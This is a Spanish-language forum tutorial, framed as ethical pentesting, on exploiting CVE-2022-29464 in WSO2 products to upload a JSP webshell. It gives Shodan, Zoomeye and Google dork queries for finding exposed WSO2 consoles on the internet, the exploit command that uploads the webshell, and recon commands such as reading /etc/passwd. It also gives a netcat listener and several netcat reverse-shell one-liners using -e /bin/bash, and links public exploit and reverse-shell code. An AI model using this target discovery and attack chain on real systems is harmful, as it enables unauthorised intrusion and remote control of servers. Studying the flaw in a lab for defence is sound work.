Así es COMO HACKERS ACCEDEN a SERVIDORES WEB | Kali Linux Seguridad Informática

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2091
Registered for: 10 years
10
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

Así es COMO HACKERS ACCEDEN a SERVIDORES WEB | Kali Linux Seguridad Informática

#1

Mensaje por admin »

Se analizara la siguiente vulnerabilidad CVE-2022-29464 que se encuentra en productos WSO2. Estos productos están alojados en un server web donde se ejecutan archivos de lenguaje dinámico JSP (Java Server Page o jakarta server page).
Ciertos productos WSO2 permiten la carga de archivos sin restricciones con la ejecución de código remoto. Te permite cargar de archivos sin restricciones que permite a los atacantes no autenticados obtener la ejecución remota de código en los productos WSO2 mediante la carga de archivos JSP maliciosos.
En este ejemplo vamos a subir un JSP que en definitiva es un webshell, un intepretador de comandos que nos permite ejecutar comandos en el servidor vulnerado.
Esto es un buen ejercicio de pentesting y puede ser importante para aquellos que tengan que auditar infraestructura
donde este tipo de escenarios donde esten los productos WSO2 esten instalados.


Imagen
 
LINKS o ENLACES IMPORTANTES

https://github.com/devengpk/CVE-2022-29464

https://github.com/tennc/webshell/blob/ ... everse.jsp
https://github.com/LaiKash/JSP-Reverse- ... /shell.jsp
https://ruuand.github.io/Reverse_Shells/

https://highon.coffee/blog/reverse-shell-cheat-sheet/
https://blog.onsec.io/deep-dive-into-th ... e-exploit/
https://hub.docker.com/r/wso2/wso2is

https://github.com/amit-pathak009/CVE-2022-29464-mass
https://github.com/ivan-sincek/java-rev ... _shell.jsp
https://node-security.com/posts/jsp-war-shell/
https://www.infosecademy.com/netcat-reverse-shells/
https://patchthenet.com/articles/create ... ng-netcat/
https://github.com/ivan-sincek/java-rev ... jsp-shells
https://www.vicarius.io/vsociety/blog/w ... p-10597848

COMANDOS IMPORTANTES

Código: Seleccionar todo

Shodan
WSO2 port:9443

Zoomeye

zoomeye search 'title:"WSO2 Management Console"' -num 10 -filter=ip,port
'title:"WSO2 Management Console"'

Google Dorks
title:"WSO2 Management Console"
inurl:"/carbon/admin/login.jsp"
inurl"/authtenticationdpoit/login.do"
inurl:"/authenticationendpoint/login.do"
inurl:"devportal/apis"
intitle:"API Publisher- Login"
intitle:"WSO2 Management Console"

Comando para subir el webshell

python3 exploit.py https://192.168.20.183:9443 index.jsp


Comandos para poner en el webshell

ls -l
cat /etc/passwd
id
pwd
uname -a
cd /
ls
cat /etc/hosts
cat /etc/sysconfig/network
hostname
ls /sys/class/net
ip addr

Listener

nc -nvlp 3155


Para establecer el reverse shell conecction

nc -nv 192.168.20.183 3155
nc 192.168.20.183 3155 -e /bin/bash
nc -c bash 192.168.20.183 3155
nc -e /bin/bash 192.168.20.183 3155 

LABORATORIO de PRUEBAS

Imagen
 Imagen
VIDEO TUTORIAL



Hackers,Seguridad informática,Kali Linux,Vulnerabilidades web,Servidores web,Hacking ético,Penetration testing,Exploits,WSO2,CVE-2022-29464,Código remoto,Ejecución remota de código,Webshells,Auditoría de infraestructura,Lenguaje dinámico JSP,Java Server Page,Jakarta Server Page,Seguridad en servidores,Protección de datos,Pentesting avanzado,Hacking de servidores,Seguridad en aplicaciones web,Ciberseguridad,Ethical hacking,Protección de servidores,Redes de computadoras,Seguridad en redes,Auditoría de seguridad,Protección de la información personal,Seguridad en línea,Protección de la privacidad en línea,Amenazas informáticas,Ciberataques,Pentest Lab Setup,Python,Laboratorio de Trabajo,Ciberdelincuencia,Seguridad de la red doméstica,Penetration Tester,Cybersecurity Consultant,learn security,OSINT,oscp certification,try hack me hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,remote function,laboratorio,lab,servidor,como escalar privilegios en linux,CVE,hacker exploit,what is a red team,red team exploitation,metasploit,OSI Model Modelo,TCP/IP,Cyberseguridad,VPN,Testing,API Manager,Identity Server,Identity Server Analytics,Identity Server as Key Manager,Enterprise Integrator,Remote Code Execution,RCE,WSO2 API Manager,Docker images,Linux Ubuntu,Container,Centos Debian,RCE exploit,Java developers,Acceder a Servidores,Seguridad de la información,Análisis de vulnerabilidades,Seguridad en sistemas web,Explotación de vulnerabilidades,Seguridad en servidores web



 
 
 
 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 1 invitado